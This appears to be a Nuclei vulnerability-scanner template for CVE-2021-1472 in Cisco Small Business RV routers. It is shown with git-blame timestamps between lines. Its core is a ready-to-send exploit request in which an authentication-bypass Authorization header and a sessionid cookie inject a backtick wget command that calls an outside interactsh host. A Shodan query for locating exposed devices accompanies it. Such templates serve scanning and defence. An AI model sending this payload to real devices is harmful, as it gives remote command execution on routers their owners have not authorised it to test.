2022-09-08 13:28:46 +00:00
id : CVE-2021-1472
2022-05-21 15:15:55 +00:00
info :
2022-10-10 19:22:59 +00:00
name : Cisco Small Business RV Series - OS Command Injection
2022-05-21 15:15:55 +00:00
author : gy741
severity : critical
description : |
2022-10-10 19:22:59 +00:00
Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.
2022-05-21 15:15:55 +00:00
reference :
- https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
- https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-1472
- https://nvd.nist.gov/vuln/detail/CVE-2021-1473
2023-07-11 19:49:27 +00:00
- http://seclists.org/fulldisclosure/2021/Apr/39
2022-05-21 15:15:55 +00:00
classification :
2022-10-10 19:40:25 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-08-27 04:41:18 +00:00
cve-id : CVE-2021-1472
2023-10-19 10:38:59 +00:00
cwe-id : CWE-287,CWE-119
2023-10-14 11:27:55 +00:00
epss-score : 0.97318
2023-10-27 16:34:45 +00:00
epss-percentile : 0.99839
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*
2022-07-18 09:52:26 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cisco
product : rv160_firmware
2023-09-06 12:09:01 +00:00
shodan-query : http.html:"Cisco rv340"
2023-07-12 11:56:50 +00:00
tags : packetstorm,seclists,auth-bypass,injection,cve,cve2021,cisco,rce,intrusive
2022-05-21 15:15:55 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-21 15:15:55 +00:00
- raw :
- |
POST /upload HTTP/1.1
Host : {{Hostname}}
Cookie : sessionid='`wget http://{{interactsh-url}}`'
Authorization : QUt6NkpTeTE6dmk4cW8=
Content-Type : multipart/form-data; boundary=---------------------------392306610282184777655655237536
-----------------------------392306610282184777655655237536
Content-Disposition : form-data; name="option"
5NW9Cw1J
-----------------------------392306610282184777655655237536
Content-Disposition : form-data; name="destination"
J0I5k131j2Ku
-----------------------------392306610282184777655655237536
Content-Disposition : form-data; name="file.path"
EKsmqqg0
-----------------------------392306610282184777655655237536
Content-Disposition : form-data; name="file"; filename="config.xml"
Content-Type : application/xml
qJ57CM9
-----------------------------392306610282184777655655237536
Content-Disposition : form-data; name="filename"
JbYXJR74n.xml
-----------------------------392306610282184777655655237536
Content-Disposition : form-data; name="GXbLINHYkFI"
<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
-----------------------------392306610282184777655655237536 --
2022-07-18 15:19:58 +00:00
matchers-condition : and
2022-05-21 15:15:55 +00:00
matchers :
- type : word
part : interactsh_protocol
words :
- http
2022-07-18 15:19:58 +00:00
- type : word
part : body
words :
- '"jsonrpc":'
2023-10-28 07:54:29 +00:00
# digest: 4a0a00473045022004b337528617167a4dacb4d7ceea7c7555f635a49a3ca5f991c52cc4c08223a8022100a0d067a5d47aaa8de4f8e9bdbb96e622c5097ec8eb67fee2c38dae2b4b786c5b:922c64590222798bb761d5b6d8e72950